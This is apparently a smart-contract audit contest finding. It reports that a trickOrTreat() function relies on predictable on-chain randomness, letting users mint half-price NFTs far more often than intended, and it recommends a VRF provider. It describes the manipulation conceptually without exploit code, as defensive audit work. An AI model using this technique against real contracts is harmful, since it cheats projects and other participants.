The contract generates a random value from on-chain information which is manipulatable.
The code on lines 56-57 generates a random value from a set of on-chain data. This method is known to be unsafe. A user can guess the random value before executing function trickOrTreat()
to make the result favourable to the user.
This means that the user's chance to get a treat (an NFT for half the price) is much more than 1/1000.
A user can mint an NFT for half the price with a much higher probability.
Manual review.
Consider using a more secure random generator method, for example by querying from a VRF provider.
It's written in the README: "We're aware of the pseudorandom nature of the current implementation. This will be replaced with Chainlink VRF in later builds." This is a known issue.
The contest is live. Earn rewards by submitting a finding.
This is your time to appeal against judgements on your submissions.
Appeals are being carefully reviewed by our judges.